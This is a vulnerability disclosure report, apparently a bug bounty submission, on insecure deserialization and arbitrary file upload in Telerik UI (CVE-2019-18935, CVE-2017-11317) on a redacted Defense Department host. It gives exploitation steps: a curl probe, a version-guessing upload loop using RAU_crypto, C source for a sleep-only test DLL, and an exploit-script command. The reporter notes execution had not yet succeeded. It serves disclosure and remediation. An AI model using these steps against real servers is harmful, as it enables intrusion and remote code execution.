U.S. Dept Of Defense: Remote Code Execution via Insecure Deserialization in Telerik UI (CVE-2019-18935)

Description:
https://██████/██████████/Telerik.Web.UI.WebResource.axd?type=rau is vulnerable to CVE-2017-11317 and CVE-2019-18935, allowing an attacker to upload arbitrary files and gain remote code execution on the underlying system.

References

https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui

Impact

An attacker can execute code on the vulnerable server, allowing an attacker to gain a foothold and exfiltrate data. Depending on the security posture of the underlying system, an attacker may be able to escalate privileges or laterally move to other systems within the network using this access.

System Host(s)

████

Affected Product(s) and Version(s)

Telerik UI Version ███

CVE Numbers

CVE-2017-11317, CVE-2019-18935

Steps to Reproduce

Verify the Upload Handler is Registered

First, confirm the file upload handler is registered by issuing the following request:

curl -sk https://██████████/██████████/Telerik.Web.UI.WebResource.axd?type=rau

You should see the following response:

{ "message" : "RadAsyncUpload handler is registered succesfully, however, it may not be accessed directly." }

Version Identification

Next, you will need to install RAU_crypto (https://github.com/bao7uo/RAU_crypto) and use it to submit upload requests with known vulnerable versions until finding the correct version. After RAU_crypto has been installed, you can use the following script (with the attached versions.txt file):

echo 'test' > testfile.txt
for VERSION in $(cat versions.txt); do
            echo -n "$VERSION: "
                python3 RAU_crypto.py -P '█████' "$VERSION" testfile.txt https://█████████/█████/Telerik.Web.UI.WebResource.axd?type=rau 2>/dev/null | grep fileInfo || echo
        done

This uploads a file (in this case, testfile.txt) to the █████ directory on the target server. The contents of my testfile.txt simply included the word “test”.

The script should eventually identify a vulnerable version (████████), indicating the file upload succeeded and showing an encrypted blob of data related to the uploaded file:

█████████: {"fileInfo":{"FileName":"RAU_crypto.bypass","ContentType":"text/html","ContentLength":5,"DateJson":█████ }

Compiling a Test Payload

Now that we know we can upload a file to the target, we can attempt to exploit the deserialization vulnerability. To do this, we can compile and upload a DLL that causes the server to sleep for 10 seconds before responding:

#include <windows.h>
#include <stdio.h>

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
    if (fdwReason == DLL_PROCESS_ATTACH)
        Sleep(10000);  // Time interval in milliseconds.
    return TRUE;
}

As a .NET application will only load an assembly once with a given name, the dll from my test will only successfully sleep the server on the first exploit. I have compiled and attached an unused dll for testing purposes if desired (if not, just follow the steps from the link in the references section).

Exploitation

Now that we have our test payload ready, we can use the attached CVE-2019-18935.py script to upload and execute the dll.

python3 CVE-2019-18935.py -u https://███████/███/Telerik.Web.UI.WebResource.axd?type=rau -v ██████████ -f '███' -p sleep_2020070207013954_amd64.dll

> Note: I’m having trouble getting the server to sleep with the crafted .dll. The files are getting uploaded, but do not seem to be causing the server to sleep as expected. It is 02:30 AM here at the moment so I am heading to bed but will update tomorrow with more info in the comments, and will end up self closing if I can’t get execution.

Suggested Mitigation/Remediation Actions

Update TelerikUI to the latest (or a patched) version.